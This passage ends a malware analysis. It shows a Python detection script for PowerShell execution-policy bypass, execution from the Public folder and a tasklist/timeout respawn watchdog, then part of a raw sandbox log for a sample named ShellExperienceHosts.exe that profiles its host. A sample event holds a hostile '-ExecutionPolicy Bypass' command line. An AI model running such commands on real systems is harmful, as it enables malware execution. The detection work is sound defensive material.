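    event(PS, CMD, 1200, r"powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1"),
    event(r"C:\Windows\System32\tasklist.exe", r"C:\Windows\System32\cmd.exe", 4000, "tasklist /v"),  # benign control
]

PUBLIC = re.compile(r"^[a-z]:\\users\\public\\", re.IGNORECASE)
# PowerShell accepts abbreviated parameter names, so match -ExecutionPolicy, -ex, -ep, ...
POLICY_BYPASS = re.compile(r"(?:-ex\w*|-ep)\s+(?:bypass|unrestricted)|set-executionpolicy\s+(?:unrestricted|bypass)",
                           re.IGNORECASE)
TASKLIST_FILTER = re.compile(r'tasklist\s+/FI\s+"IMAGENAME eq ([^"]+)"', re.IGNORECASE)
TIMEOUT = re.compile(r"timeout\s+/t\s+\d+", re.IGNORECASE)

def public_folder_rules(ev):
    """Sigma-style 'Execution from Suspicious Folder' / 'Parent in Public Folder' checks."""
    alerts = []
    if PUBLIC.match(ev["Image"]):
        alerts.append(("execution_from_public_folder", ev["Image"]))
    if PUBLIC.match(ev["ParentImage"]):
        alerts.append(("parent_in_public_folder", ev["ParentImage"]))
    return alerts

def execution_policy_rule(ev):
    """Both forms seen in the report: Set-ExecutionPolicy Unrestricted and -ExecutionPolicy Bypass."""
    if ev["Image"].lower().endswith("powershell.exe") and POLICY_BYPASS.search(ev["CommandLine"]):
        return [("powershell_execution_policy_bypass", ev["CommandLine"])]
    return []

def watchdog_rule(events, min_cycles=2):
    """One parent repeatedly running tasklist /FI for the same image plus timeout: a respawn watchdog."""
    per_parent = {}
    for ev in events:
        bucket = per_parent.setdefault(ev["ParentProcessId"], {"targets": [], "timeouts": 0})
        if m := TASKLIST_FILTER.search(ev["CommandLine"]):
            bucket["targets"].append(m.group(1))
        if TIMEOUT.search(ev["CommandLine"]):
            bucket["timeouts"] += 1
    alerts = []
    for ppid, b in per_parent.items():
        if len(b["targets"]) >= min_cycles and b["timeouts"] >= min_cycles and len(set(b["targets"])) == 1:
            alerts.append(("process_watchdog_loop",
                           f"ppid={ppid} target={b['targets'][0]} cycles={len(b['targets'])}"))
    return alerts

def detect(events):
    """Per-event rules first, then the cross-event watchdog rule."""
    alerts = []
    for ev in events:
        alerts += public_folder_rules(ev) + execution_policy_rule(ev)
    return alerts + watchdog_rule(events)

if __name__ == "__main__":
    for rule, detail in detect(EVENTS):
        print(f"{rule}: {detail}")
```

The watchdog rule is the one worth keeping in a real ruleset: a single tasklist or timeout is everyday administration (the benign control event produces nothing), but the same cmd.exe parent issuing tasklist /FI "IMAGENAME eq X" and timeout /t N at least twice for one image is the respawn loop this report shows, and correlating on the parent rather than on individual events is what keeps the rule quiet on interactive use.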
Source: ShellExperienceHosts.exe, 00000003.00000003.3340498276.0000000004361000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.3497744924.0000000004361000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2690465523.000000000433D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 0 minProgram Manager
Source: ShellExperienceHosts.exe, 00000003.00000002.3544211309.0000000004361000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: inProgram Manager
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_03325430 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_6C7A2B58 GetModuleHandleW,GetProcAddress,EncodePointer,DecodePointer,GetLocaleInfoW
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Code function: 3_2_6C865A0C GetLocaleInfoW
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (5 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (2 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
